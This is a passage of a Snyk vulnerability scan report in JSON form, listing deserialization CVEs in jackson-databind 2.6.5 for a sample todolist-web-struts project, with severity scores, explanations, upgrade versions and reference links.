([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. 
The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.1, 2.8.11.4, 2.7.9.6 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/5f7c69bba07a7155adde130d9dee2e54a54f1fa5)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2341)\n- [PoC Repository](https://github.com/Al1ex/CVE-2019-12814)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 5.9, + "security-severity": "5.9" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450917", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2019-12384) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are 
vulnerable to Deserialization of Untrusted Data which allows attackers to have a variety of impacts by leveraging failure to block the `logback-core` class from polymorphic deserialization. Depending on the `classpath` content, remote code execution may be possible.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.1, 2.8.11.4, 2.7.9.6 or higher.\n# References\n- [Debian Security Announcement](https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html)\n- [Exploit](https://github.com/jas502n/CVE-2019-12384)\n- [Github Fix](https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2334)\n- [Jackson CVEs Don't Panic - Blog](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [Release Notes](https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/release-notes/VERSION-2.x)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": 
"8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2019-14379) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. `SubTypeValidator.java` mishandles default typing when `ehcache` is used, leading to remote code execution.\n\n\n **NOTE:** This vulnerability has also been identified as: [CVE-2019-14439](https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407)\n\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.2, 2.8.11.4, 2.7.9.6 or higher.\n# References\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2387)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2389)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2395)\n- [Snyk Blog](https://snyk.io/blog/jackson-deserialization-vulnerability/)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467014", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2019-16335) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: 
io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as `com.zaxxer.hikari.HikariDataSource` was not blocked.\r\n**Note:** This is a different vulnerability than CVE-2019-14540.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. 
Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2449)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467015", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2019-14540) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
A Polymorphic Typing issue was discovered as `com.zaxxer.hikari.HikariConfig` was not blocked.\r\n**Note:** This is a different vulnerability than CVE-2019-16335.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n# References\n- [Exploit](https://github.com/LeadroyaL/cve-2019-14540-exploit)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2410)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467016", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* 
Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.cxf.jaxrs.provider.XSLTJaxbProvider`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. 
Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2420)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469674", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2019-16942) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
A Polymorphic Typing issue was discovered within `org.apache.commons.dbcp.datasources.SharedPoolDataSource` was not blocked. An attacker could leverage this gadget type to perform Remote Code Execution attacks through deserialization.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1, 2.8.11.5, 2.6.7.3 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2478)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469676", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2019-16943) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: 
io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as `com.p6spy.engine.spy.P6DataSource` was not blocked. An attacker could leverage this gadget type to perform Remote Code Execution attacks through deserialization.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. 
The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1, 2.8.11.5, 2.6.7.3 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2478)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-471943", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2019-17267) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
A Polymorphic Typing issue was discovered related to `net.sf.ehcache.hibernate.EhcacheJtaTransactionManagerLookup`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains 